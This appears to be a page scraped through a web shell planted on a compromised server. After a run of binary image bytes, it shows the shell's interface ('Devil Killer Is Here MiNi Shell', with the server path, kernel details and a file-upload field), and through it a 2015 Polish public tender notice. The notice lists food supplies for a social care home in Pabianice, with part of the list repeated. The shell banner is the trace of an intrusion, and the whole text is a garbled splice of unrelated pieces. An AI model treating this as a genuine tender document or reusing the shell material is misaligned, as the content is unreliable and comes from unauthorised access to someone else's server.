JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20151028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20151028/288126-N-2015.html

<p class="kh_header"><b>Pabianice: Dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie od 01.01.2016r do 31.12.2016r</b><br>
<b>Numer ogłoszenia: 288126 - 2015; data zamieszczenia: 28.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 42 213 75 51, faks 42 213 76 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pabianice-dps.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc Społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie od 01.01.2016r do 31.12.2016r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów dla Domu Pomocy w Pabianicach w terminie od 01.01.2016r do 31.12.2016r, zgodnie z powyższym wykazem: 
Część A

1.Barszcz czerwony koncentrat min   320g
max 500g	kg	48		
2.Chrzan z kwaskiem cytrynowym skład: korzeń chrzanu  nie mniej niż 52% , woda, cukier, olej roślinny min  300g
max 450g	kg	30		
3.Ćwikła z chrzanem, skład: buraczki ćwikłowe nie mniej niż 61% ,świeży korzeń chrzanu nie mniej niż 19%		min 350g
max 450g	kg	35		

4.Dżem wiśniowy, (zawartość owoców  nie mniej niż 35g na 100g produktu lub proporcjonalnie)		min 280g
max 450g	kg	190		

5.Dżem truskawkowy, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	190		
6.Dżem z czarnej porzeczki, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	100		
7.Fasola Jaś paczkowana ,ziarno wielkości od 18-25mm, białe bez przebarwień		min 400g
max 5kg	       kg	100		
8.Fasola konserwowa, (po odcieku nie mniej niż  280g lub proporcjonalnie)		min 460g
max 620g	kg	46		
9.Groszek konserwowy,( ze świeżego ziarna, po odcieku nie mnij niż 120g lub proporcjonalnie)		min 200g
max 400 g	kg	240		
10.Groch suchy łupany paczkowany		min 400g
max 5 kg	kg	50		
11.Koncentrat pomidorowy nie mniej niż 30% ze świeżych pomidorów typu Włocławek lub równoważny		min 970g
max 1000g	kg	388		
12.Koncentrat pomidorowy nie mniej niż 30%  ze świeżych pomidorów typu Włocławek lub równoważny		min 200g
max 300g	kg	44		
13.Kompot wiśniowy na cukrze (zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953
		min 900g
max 1000g	kg	1500		

14.Kompot  truskawkowy na cukrze(zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953		min 900g
max 1000g	kg	300		
15.Ogórki konserwowe (po odcieku nie mniej niż 490g lub proporcjonalnie) PN-75/A-75953
		    min   800g max  1500g	kg	1164		
16.Kukurydza konserwowa (po odcieku nie mniej niż 220g lub proporcjonalnie)		min 400g
max 440g	kg	120		
17.Szczaw konserwowy  		min 320g
max 900g	kg	96		
18.Syrop owocowy typu  Paola lub równoważny (zagęszczony wysokosłodzony, pasteryzowany zawierający  syrop glukozowo-fruktozowy, cukier)		min 430ml
max 1000ml	l	       50		
19.Cukier paczkowany		min1kg
max 3kg	kg	5000		
20.Cukier puder		min 400g
max 1kg	kg	48		
21.Cukier wanilinowy 		min  32g
max 64g	kg	25,60		
22.Sól spożywcza, paczkowana, warzona, jodowana		min 1kg
max 5kg	kg	900		
23.	Herbatka owocowa expresowa 
w torebkach/malinowa, owoce leśne, żurawina/ 		min 30g
max 50g 	kg	57		
24.	Herbata granulowana czarna, kraj pochodzenia Indie grube granulki bez zanieczyszczeń		min 100g
max 200g	kg	300		
25.	Kawa Inka		min 150g
max 300g	kg	21		
26.	Kakao extra ciemne Decomorreno lub równoważne  (zawartość tłuszczu nie mniej niż 10-12% )		min 100g
max 200g	kg	40		
27.	Liść laurowy		min 8g
max 50g	kg	2,80		
28.	Majeranek		min 20g
max 50g	kg	6		
29.	Pieprz mielony(zawartość pieprzu 100%)		min 20g
max 50g	kg	14		
30.	Żelatyna 		min 50g
max 200g	kg	5		
31.	Cynamon		min 20g
max 50g	kg	5		
32.	Przyprawa typu Warzywko (zawartość suszonych warzyw nie mniej niż 15,1% zawierająca  pomidory)		min 75g
max 200g	kg	50		
33.	Proszek do pieczenia		min 36g
max 50g	kg	32,40		
34.	Papryka konserwowa (po odcieku nie mniej niż 320g lub proporcjonalnie)		min 670g
max 900g	kg	268		
35.	Zupa grzybowa w proszku
(typu Winiary lub równoważna)		min 45g
max 100g	kg	      120		
36.	Zupa grochowa w proszku		min 45g
max 100g	kg	11,25		
37.	Aromat		min 10g
max 20g	kg	4		
38.	Budyń śmietankowy, waniliowy, malinowy, czekoladowy		min 40g
max 50g	kg	315		
39.	Kisiel wiśniowy, truskawkowy, cytrynowy, żurawinowy		min 40g
max 50g	kg	180		
40.	Słodzik 100 tabletek		min 4g
max 5g	kg	2,25		
41.	Rosołki drobiowe, wołowe		min 60g
max 100g	kg	48		
42.	Ocet		min 500ml
max 1l	l	20		
43.	Przyprawa do zup w płynie		min 1kg
max 1,50lkg	kg	110		
44.	Musztarda delikatesowa		min190g
max 250g	kg	140		
45.	Kwasek cytrynowy		min 20g
max 50g	kg	16		
46.	Majonez skład: olej roślinny, żółtko jaj nie mniej niż 6%, ocet, musztarda, kwas cytrynowy		min 400ml
max 620ml	l	240		
47.	Ziele angielskie		min 15g
max 50g	kg	4,50		
48.	Makaron z mąki makaronowej		       min 500g
       max 1000g	kg	1700		

49.Makaron z semoliny 100% typu Lubella lub równoważny		min 500g
max 1000g	kg	100		
50.Papryka słodka w proszku		min 20g
max 50g	kg	1,00		
51.Ketchup  typu Włocławek lub równoważny (skład:100g produktu uzyskane z co najmniej 163g pomidorów lub proporcjonalnie)
		min 480g
max 500g	kg	150		

52.Ryż paczkowany, długoziarnisty, gat. I 		min 1kg
max 3 kg	kg	900		

53.Mąka ziemniaczana paczkowana		min 500g
max 1 kg	kg	300		

54.Mąka pszenna paczkowana typ 480		min 1kg
max 3 kg	kg	4000		
55.Kasza gryczana palona paczkowana gat. I		min 500g
max 5kg	kg	300		
56.Kaszka ml-ryżowa, na mleko nie mniej niż 38% mleko modyfikowane, nie mniej niż 32% odtłuszczone mleko w proszku 		min 230g
max 500g	kg	4,60		
57.Kasza manna paczkowana		min 1kg
max 3kg	kg	320		
58.Kasza jęczmienna średnia paczkowana		min 1kg
max 3 kg	kg	200		
59.Płatki owsiane górskie paczkowane (do zalewania wrzątkiem)		 min 500g
max 1 kg	kg	150		
60.Olej rzepakowy 		min 1l
max 3l	l	750		
61.Olej rzepakowy 		
 0,50 l	l	350		
62.	Miód wielokwiatowy typu Tymbark lub równoważny ,kubek plastikowy (nie torebka)		min 25g
max 30g	kg	200		
63.	Kleik ryżowy na mleko (skład: mąka ryżowa 100%, witamina B1)		min 170g
max 200g	kg	8,50		
64.	Suchary delikatesowe		min 290g
max 500g	kg	5,80		
65.	Listki waflowe bez cukru dla diabetyków		min 32g
max 100g	kg	34,20		

66.Wafelki bez cukru dla diabetyków		min 40g
max 100g	kg	48		
67.Herbatniki lekkie bez cukru dla diabetyków		min 73g
max 120g	kg	80		
68.Biszkopty paczkowane		min 250g
max 500g	kg	225		
69.Smalec paczkowany		min 200g
max 500g	kg	100		
70.Grzyby suszone podgrzybki,     nie krojone 		min 500g
max 1kg	kg	3		
71.Jabłka suszone		min 500g
max 2kg	kg	12		
72.Śliwki bez pestek suszone		min 500g
max 2kg	kg	15		
73.Galaretka truskawkowa		min 70g
max 100g	kg	112,50		
74.Dżem bez cukru: czarna porzeczka, wiśnia ,truskawka, brzoskwinia, malina, zawartość owoców  nie mniej niż 50%, fruktoza nie mniej niż 28% 		min 190g
max 250g	kg	475		
75.Czosnek suszony		min 20g
max 50g	kg	1		
76.Margaryna zwykła kostka		min 250g
max 500g	kg	400		
77.Masło roślinne kostka		min 250g
max 500g	kg	200		

Część: B

1.	Filet z ryb mrożonych panga 		---	kg	800		
2.	Filet z ryb mrożonych mintaj ( nie z dostaw chińskich)		---	kg	100		
3.	Filet z ryb mrożonych morszczuk ( nie z dostaw chińskich)		---	kg	100		
4.	Śledzie płaty 		---	kg	100		
5.	Makrela wędzona		---	kg	100		

Część: C

1.	Mleko  pasteryzowane, homogenizowane, (zawartość tłuszczu 2%, folia) 		min 3 l
max 5 l	l	22 500		
2.	Masło Extra, 
(zawartość tłuszczu nie mniej niż 82% , paczkowane)		min 200g
max 250g	kg	3 000		
3.	Serek homogenizowany (smak waniliowy, truskawkowy, malinowy)		min 150g
max 170g	kg	240		
 4.	Ser biały, twarogowy, półtłusty, paczkowany, terminizowany		min 250g
max 1kg	kg	1400		
 5.	Serek typu kanapkowy lub równoważny, 
(serek twarogowy, kremowy, naturalny, terminizowany, zawartość tłuszczu nie mniej niż 12%)		min 100g
max 140g	kg	240		
 6.	Serek topiony kremowy (terminizowany, zawartość tłuszczu nie mniej niż 27%)		min 50g
max 150g	     kg	600		
7.	Ser żółty pełnotłusty  typu Gouda lub równoważny
( zawartość tłuszczu nie mniej niż 26% )		---	kg	300		
8.	Śmietana homogenizowana, (zawartość tłuszczu 18%)		min 200g
max 400g	kg	360		
9.	Jogurt naturalny (zawartość tłuszczu nie mniej niż 2%)		min 150g
max 500g	kg	280		
10.	Jogurt owocowy z kawałkami owoców,
(skład: nie mniej niż 9% owoców, sok z owoców, cukier, mleko w proszku odtłuszczone)		min 125g
max 170g	kg	675		                                                                                                                                           

Część: D

1.	Chleb pszenny, krojony, paczkowany		min 600g
max 1kg	kg	14 900		

2.	Chleb razowy, krojony, paczkowany		min 400g
max 600g	kg	400		

3.	
Bułka pszenna		min 40g
max 60g	kg	2000		
 
 4.
	Bułka tarta, paczkowana		min 500g
max 1kg	kg	400		

5.
	Drożdże		min 250g
max 1kg	kg	50		
6.
	Żurek		min 1l
max 5 l	     l	400		

7.
 	Rogal maślany		min 80g
max 100g	kg	600		

8.
 	Angielka krojona, paczkowana		min 300g
max 500g	kg	3360		

9.
	Chałka		min   300g
max  500g	kg	350		

Część: E

 1.	Buraki		---	kg	2500		
 2.	Botwina		       ---	pęczki	  350		
 3.	Brukselka		---	kg	  200		
  4.	Brokuły		---	szt	 1000		
  5.	Cebula		---	kg	   1000		
  6.	Czosnek		---	szt	  100		
7.	Fasolka szparagowa		---	kg	   50		
8.	Kalafior		---	szt	  900		
9.	Koperek		---	kg	  100		
10.	Kapusta biała		---	szt	2500		
11.	Kapusta czerwona		---	kg	  350		
12.	Kapusta pekińska		---	kg	  200		
13.	Kapusta włoska		---	szt	  500		
13.	Marchew		---	kg	   5500		
14.	Ogórek zielony		---	kg	   1000		
15.	Pietruszka		---	kg	   1500		
16.	Nać pietruszki		---	kg	  160		
17.	Por		---	kg	  200		
18.	Pomidory		---	kg	   4500		
19.	Papryka czerwona		---	Kg	    50		
20.	Papryka żółta		        ---	kg	    50		
  21.	Rzodkiewka		---	pęczki	  450		
  22.	Sałata		---	szt	   5500		
  23.	Seler		---	kg	   1000		
  24.	Szczypiorek		---	pęczki	 500		

Część: F

1.	Ziemniaki jadalne, klasa I
(pakowane w workach)		min 10 kg
max 25 kg	kg	37 000		

Część: G


1.	Jabłka klasa I
( pakowane w skrzynki plastikowe lub drewniane)		min 10 kg
max 20 kg	kg	4500		

Część: H

1.	Kapusta kiszona		---	kg	1 300		
2.	Ogórek kiszony		---	kg	700		

Część: I

1.	Jajka kurze świeże klasa L --- szt 58 000..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.85.00.00-1, 15.80.00.00-6, 15.22.00.00-6, 15.20.00.00-0, 15.50.00.00-3, 15.51.00.00-6, 15.54.00.00-5, 15.81.00.00-9, 03.22.00.00-9, 03.21.21.00-1, 03.22.00.00-9, 15.33.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie załącznika nr 2 do specyfikacji, który winien być załączony do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie załącznika nr 2 do specyfikacji, który winien być załączony do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia stanowiącego  załącznik nr 2 oraz załącznik nr 5 do specyfikacji, które winny być załączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie  podpisanie i załączenie do oferty załącznika nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie  podpisanie i załączenie do oferty załącznika nr 2 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany cen w przypadku dostaw warzyw, ziemniaków,    
      jabłek, kapusty i ogórków kiszonych (załączniki nr 4 E, F, G, H). Wzrost cen   
      zaproponowany przez Wykonawcę nie może przewyższać wysokości cen obowiązujących 
      w danym okresie na targowisku -Zjazdowa- w Łodzi, publikowanym na stronie 
      internetowej www.zjazdowa.com.pl . W pozostałych asortymentach ceny pozostają stałe 
      w ciągu całego roku, z wyjątkiem ustawowej  zmiany stawki podatku 
      VAT, wprowadzonych na podstawie przepisów prawa, przy czym zmianie ulegnie 
      wyłącznie cena brutto danego towaru. W takim przypadku wynagrodzenie należne 
      Wykonawcy podlega automatycznej waloryzacji, bez konieczności zmiany umowy, 
      odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w      
      chwili powstania obowiązku podatkowego. Wykonawca  poinformuje Zamawiającego o 
      ich wystąpieniu na piśmie, przed wprowadzeniem nowych cen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Pabianicach ul. Wiejska 55-61. Dział żywienia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej w Pabianicach ul. Wiejska 55-61. Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych konfekcjonowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część A

1.Barszcz czerwony koncentrat min   320g
max 500g	kg	48		
2.Chrzan z kwaskiem cytrynowym skład: korzeń chrzanu  nie mniej niż 52% , woda, cukier, olej roślinny min  300g
max 450g	kg	30		
3.Ćwikła z chrzanem, skład: buraczki ćwikłowe nie mniej niż 61% ,świeży korzeń chrzanu nie mniej niż 19%		min 350g
max 450g	kg	35		

4.Dżem wiśniowy, (zawartość owoców  nie mniej niż 35g na 100g produktu lub proporcjonalnie)		min 280g
max 450g	kg	190		

5.Dżem truskawkowy, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	190		
6.Dżem z czarnej porzeczki, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	100		
7.Fasola Jaś paczkowana ,ziarno wielkości od 18-25mm, białe bez przebarwień		min 400g
max 5kg	       kg	100		
8.Fasola konserwowa, (po odcieku nie mniej niż  280g lub proporcjonalnie)		min 460g
max 620g	kg	46		
9.Groszek konserwowy,( ze świeżego ziarna, po odcieku nie mnij niż 120g lub proporcjonalnie)		min 200g
max 400 g	kg	240		
10.Groch suchy łupany paczkowany		min 400g
max 5 kg	kg	50		
11.Koncentrat pomidorowy nie mniej niż 30% ze świeżych pomidorów typu Włocławek lub równoważny		min 970g
max 1000g	kg	388		
12.Koncentrat pomidorowy nie mniej niż 30%  ze świeżych pomidorów typu Włocławek lub równoważny		min 200g
max 300g	kg	44		
13.Kompot wiśniowy na cukrze (zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953
		min 900g
max 1000g	kg	1500		

14.Kompot  truskawkowy na cukrze(zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953		min 900g
max 1000g	kg	300		
15.Ogórki konserwowe (po odcieku nie mniej niż 490g lub proporcjonalnie) PN-75/A-75953
		    min   800g max  1500g	kg	1164		
16.Kukurydza konserwowa (po odcieku nie mniej niż 220g lub proporcjonalnie)		min 400g
max 440g	kg	120		
17.Szczaw konserwowy  		min 320g
max 900g	kg	96		
18.Syrop owocowy typu  Paola lub równoważny (zagęszczony wysokosłodzony, pasteryzowany zawierający  syrop glukozowo-fruktozowy, cukier)		min 430ml
max 1000ml	l	       50		
19.Cukier paczkowany		min1kg
max 3kg	kg	5000		
20.Cukier puder		min 400g
max 1kg	kg	48		
21.Cukier wanilinowy 		min  32g
max 64g	kg	25,60		
22.Sól spożywcza, paczkowana, warzona, jodowana		min 1kg
max 5kg	kg	900		
23.	Herbatka owocowa expresowa 
w torebkach/malinowa, owoce leśne, żurawina/ 		min 30g
max 50g 	kg	57		
24.	Herbata granulowana czarna, kraj pochodzenia Indie grube granulki bez zanieczyszczeń		min 100g
max 200g	kg	300		
25.	Kawa Inka		min 150g
max 300g	kg	21		
26.	Kakao extra ciemne Decomorreno lub równoważne  (zawartość tłuszczu nie mniej niż 10-12% )		min 100g
max 200g	kg	40		
27.	Liść laurowy		min 8g
max 50g	kg	2,80		
28.	Majeranek		min 20g
max 50g	kg	6		
29.	Pieprz mielony(zawartość pieprzu 100%)		min 20g
max 50g	kg	14		
30.	Żelatyna 		min 50g
max 200g	kg	5		
31.	Cynamon		min 20g
max 50g	kg	5		
32.	Przyprawa typu Warzywko (zawartość suszonych warzyw nie mniej niż 15,1% zawierająca  pomidory)		min 75g
max 200g	kg	50		
33.	Proszek do pieczenia		min 36g
max 50g	kg	32,40		
